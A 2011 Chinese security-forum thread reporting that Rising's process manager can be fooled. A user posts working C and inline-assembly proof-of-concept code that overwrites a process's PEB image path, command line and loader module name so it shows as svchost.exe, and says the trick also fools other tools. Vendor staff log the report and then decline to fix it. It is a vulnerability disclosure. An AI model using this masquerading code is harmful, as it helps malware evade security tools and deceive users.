安全助手的进程管理器存在路径识别BUG bbs.ikaka.com

最硬的石头 - 2011-2-21 10:47:00

进程可以轻松的通过PEB->_RTL_USER_PROCESS_PARAMETERS ->ImagePathName修改自身的路径来欺骗瑞星安全助手的进程管理器
在XP SP3, X86下的测试

看图中的ModifyImagePath.exe瑞星的进程管理器中显示的是安全:kaka12:，难道已经入库了

在点击进程名，打开属性，很明显这是系统svchost的属性:kaka18:

这方法好像也能骗过卡卡6和SRENG。。。。

在XP下的测试代码如下：

[复制到剪贴板]

CODE:

int _tmain(int argc, _TCHAR* argv[])
{
WCHAR szpath[MAX_PATH] = {0};
int len = 0;
len = GetSystemDirectory(szpath,MAX_PATH);
wcscat_s(szpath,len + 13,L"\\svchost.exe");
printf("%ls\n",szpath);

__asm
{
mov eax, fs:[30h] //get the PEB address
mov eax, [eax+0xC] //_PEB_LDR_DATA
mov eax, [eax+0xC] //InLoadOrderModuleList
lea ebx,szpath
mov WORD ptr[eax+0x24],0x60 //FullDllName->Length
mov [eax+0x28],ebx //FullDllName->Buffer

mov eax, fs:[30h]
mov eax,[eax+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[eax+0x3c] //_RTL_USER_PROCESS_PARAMETERS ->ImagePathName->Buffer
lea ebx,szpath
mov [eax],ebx //ImagePathName->Buffer
mov WORD ptr[eax-4],0x60 //ImagePathName->Length

mov eax, fs:[30h]
mov eax,[eax+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[eax+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,szpath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
getchar();
return 0;
}

操作系统：XP SP3 ，补丁打倒最新版本
安全助手版本：01.00.00.14

用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 QQDownload/1.7

附件: ModifyImagePath.rar

天月来了 - 2011-2-21 10:56:00

这个能骗过又不是一家两家的简易进程管理器:kaka6:

非内核级的普通进程管理器都可能被骗

networkedition - 2011-2-21 11:29:00

此问题已收集反馈，感谢支持！

networkedition - 2011-2-21 13:43:00

此问题暂不做修改。

瑞星卡卡安全论坛